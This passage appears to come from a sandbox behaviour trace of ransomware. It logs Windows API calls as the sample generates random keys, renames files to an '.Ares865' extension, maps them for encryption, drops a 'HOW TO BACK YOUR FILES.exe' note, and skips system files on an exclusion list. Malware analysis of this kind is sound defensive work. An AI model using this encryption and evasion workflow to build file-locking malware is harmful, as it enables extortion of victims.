hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.591] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.591] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x15c [0083.593] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x190000 [0083.594] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.595] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.595] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.595] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.Ares865") returned 64 [0083.595] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.596] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.596] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=338) returned 1 [0083.596] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.597] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.597] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.598] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x15c [0083.599] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x190000 [0083.600] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.601] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.601] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.601] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.Ares865") returned 68 [0083.601] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.603] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.603] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=362) returned 1 [0083.603] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.604] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.604] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.604] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x470, lpName=0x0) returned 0x15c [0083.606] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x470) returned 0x190000 [0083.606] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.607] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.607] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.608] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.Ares865") returned 64 [0083.608] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.609] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.609] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=338) returned 1 [0083.609] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.615] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.615] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.616] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x15c [0083.620] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x190000 [0083.621] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.622] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.622] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.622] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.Ares865") returned 68 [0083.622] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.623] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.623] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=362) returned 1 [0083.623] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.624] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.624] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.624] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x470, lpName=0x0) returned 0x15c [0083.626] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x470) returned 0x190000 [0083.627] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.628] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.628] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.628] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl.Ares865") returned 52 [0083.628] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl.ares865"), dwFlags=0x1) returned 1 [0083.629] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.629] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8668) returned 1 [0083.629] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.630] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.630] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.630] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x24e0, lpName=0x0) returned 0x15c [0083.631] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x24e0) returned 0x190000 [0083.633] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.633] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.633] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.634] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft" [0083.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6288 | out: hHeap=0x2b0000) returned 1 [0083.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0083.634] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft") returned 28 [0083.634] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft" [0083.634] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.634] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.635] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.635] GetLastError () returned 0x0 [0083.635] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.635] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.635] CloseHandle (hObject=0x120) returned 1 [0083.635] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.635] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.635] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c315d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c315d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.635] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.635] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.636] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.636] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c315d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c315d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.636] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.636] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.636] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.636] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.636] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Assistance", cAlternateFileName="ASSIST~1")) returned 1 [0083.636] lstrcmpiW (lpString1="Assistance", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.636] lstrcmpiW (lpString1="Assistance", lpString2="aoldtz.exe") returned 1 [0083.636] lstrcmpiW (lpString1="Assistance", lpString2=".") returned 1 [0083.636] lstrcmpiW (lpString1="Assistance", lpString2="..") returned 1 [0083.636] lstrcmpiW (lpString1="Assistance", lpString2="windows") returned -1 [0083.636] lstrcmpiW (lpString1="Assistance", lpString2="bootmgr") returned -1 [0083.636] lstrcmpiW (lpString1="Assistance", lpString2="temp") returned -1 [0083.636] lstrcmpiW (lpString1="Assistance", lpString2="pagefile.sys") returned -1 [0083.636] lstrcmpiW (lpString1="Assistance", lpString2="boot") returned -1 [0083.636] lstrcmpiW (lpString1="Assistance", lpString2="ids.txt") returned -1 [0083.636] lstrcmpiW (lpString1="Assistance", lpString2="ntuser.dat") returned -1 [0083.636] lstrcmpiW (lpString1="Assistance", lpString2="perflogs") returned -1 [0083.636] lstrcmpiW (lpString1="Assistance", lpString2="MSBuild") returned -1 [0083.636] lstrlenW (lpString="Assistance") returned 10 [0083.636] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\*") returned 30 [0083.636] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Assistance" | out: lpString1="Assistance") returned="Assistance" [0083.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0083.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x50) returned 0x2ed8f8 [0083.636] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0083.636] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c84ada0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c84ada0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0083.636] lstrcmpiW (lpString1="Crypto", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.636] lstrcmpiW (lpString1="Crypto", lpString2="aoldtz.exe") returned 1 [0083.636] lstrcmpiW (lpString1="Crypto", lpString2=".") returned 1 [0083.636] lstrcmpiW (lpString1="Crypto", lpString2="..") returned 1 [0083.636] lstrcmpiW (lpString1="Crypto", lpString2="windows") returned -1 [0083.636] lstrcmpiW (lpString1="Crypto", lpString2="bootmgr") returned 1 [0083.636] lstrcmpiW (lpString1="Crypto", lpString2="temp") returned -1 [0083.636] lstrcmpiW (lpString1="Crypto", lpString2="pagefile.sys") returned -1 [0083.637] lstrcmpiW (lpString1="Crypto", lpString2="boot") returned 1 [0083.637] lstrcmpiW (lpString1="Crypto", lpString2="ids.txt") returned -1 [0083.637] lstrcmpiW (lpString1="Crypto", lpString2="ntuser.dat") returned -1 [0083.637] lstrcmpiW (lpString1="Crypto", lpString2="perflogs") returned -1 [0083.637] lstrcmpiW (lpString1="Crypto", lpString2="MSBuild") returned -1 [0083.637] lstrlenW (lpString="Crypto") returned 6 [0083.637] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance") returned 39 [0083.637] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Crypto" | out: lpString1="Crypto") returned="Crypto" [0083.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0083.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x48) returned 0x2ee9c0 [0083.637] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0083.637] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0083.637] lstrcmpiW (lpString1="Device Stage", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.637] lstrcmpiW (lpString1="Device Stage", lpString2="aoldtz.exe") returned 1 [0083.637] lstrcmpiW (lpString1="Device Stage", lpString2=".") returned 1 [0083.637] lstrcmpiW (lpString1="Device Stage", lpString2="..") returned 1 [0083.637] lstrcmpiW (lpString1="Device Stage", lpString2="windows") returned -1 [0083.637] lstrcmpiW (lpString1="Device Stage", lpString2="bootmgr") returned 1 [0083.637] lstrcmpiW (lpString1="Device Stage", lpString2="temp") returned -1 [0083.637] lstrcmpiW (lpString1="Device Stage", lpString2="pagefile.sys") returned -1 [0083.637] lstrcmpiW (lpString1="Device Stage", lpString2="boot") returned 1 [0083.637] lstrcmpiW (lpString1="Device Stage", lpString2="ids.txt") returned -1 [0083.637] lstrcmpiW (lpString1="Device Stage", lpString2="ntuser.dat") returned -1 [0083.637] lstrcmpiW (lpString1="Device Stage", lpString2="perflogs") returned -1 [0083.637] lstrcmpiW (lpString1="Device Stage", lpString2="MSBuild") returned -1 [0083.637] lstrlenW (lpString="Device Stage") returned 12 [0083.637] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto") returned 35 [0083.637] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Device Stage" | out: lpString1="Device Stage") returned="Device Stage" [0083.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0083.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x54) returned 0x2df710 [0083.637] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0083.637] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0083.637] lstrcmpiW (lpString1="DeviceSync", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.637] lstrcmpiW (lpString1="DeviceSync", lpString2="aoldtz.exe") returned 1 [0083.637] lstrcmpiW (lpString1="DeviceSync", lpString2=".") returned 1 [0083.637] lstrcmpiW (lpString1="DeviceSync", lpString2="..") returned 1 [0083.637] lstrcmpiW (lpString1="DeviceSync", lpString2="windows") returned -1 [0083.638] lstrcmpiW (lpString1="DeviceSync", lpString2="bootmgr") returned 1 [0083.638] lstrcmpiW (lpString1="DeviceSync", lpString2="temp") returned -1 [0083.638] lstrcmpiW (lpString1="DeviceSync", lpString2="pagefile.sys") returned -1 [0083.638] lstrcmpiW (lpString1="DeviceSync", lpString2="boot") returned 1 [0083.638] lstrcmpiW (lpString1="DeviceSync", lpString2="ids.txt") returned -1 [0083.638] lstrcmpiW (lpString1="DeviceSync", lpString2="ntuser.dat") returned -1 [0083.638] lstrcmpiW (lpString1="DeviceSync", lpString2="perflogs") returned -1 [0083.638] lstrcmpiW (lpString1="DeviceSync", lpString2="MSBuild") returned -1 [0083.638] lstrlenW (lpString="DeviceSync") returned 10 [0083.638] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage") returned 41 [0083.638] lstrcpyW (in: lpString1=0x2cce43a, lpString2="DeviceSync" | out: lpString1="DeviceSync") returned="DeviceSync" [0083.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0083.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x50) returned 0x2ed798 [0083.638] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0083.638] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DRM", cAlternateFileName="")) returned 1 [0083.638] lstrcmpiW (lpString1="DRM", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.638] lstrcmpiW (lpString1="DRM", lpString2="aoldtz.exe") returned 1 [0083.638] lstrcmpiW (lpString1="DRM", lpString2=".") returned 1 [0083.638] lstrcmpiW (lpString1="DRM", lpString2="..") returned 1 [0083.638] lstrcmpiW (lpString1="DRM", lpString2="windows") returned -1 [0083.638] lstrcmpiW (lpString1="DRM", lpString2="bootmgr") returned 1 [0083.638] lstrcmpiW (lpString1="DRM", lpString2="temp") returned -1 [0083.638] lstrcmpiW (lpString1="DRM", lpString2="pagefile.sys") returned -1 [0083.638] lstrcmpiW (lpString1="DRM", lpString2="boot") returned 1 [0083.638] lstrcmpiW (lpString1="DRM", lpString2="ids.txt") returned -1 [0083.638] lstrcmpiW (lpString1="DRM", lpString2="ntuser.dat") returned -1 [0083.638] lstrcmpiW (lpString1="DRM", lpString2="perflogs") returned -1 [0083.638] lstrcmpiW (lpString1="DRM", lpString2="MSBuild") returned -1 [0083.638] lstrlenW (lpString="DRM") returned 3 [0083.638] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DeviceSync") returned 39 [0083.638] lstrcpyW (in: lpString1=0x2cce43a, lpString2="DRM" | out: lpString1="DRM") returned="DRM" [0083.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0083.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x42) returned 0x2ee970 [0083.638] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0083.638] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4c6f4140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6f4140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, 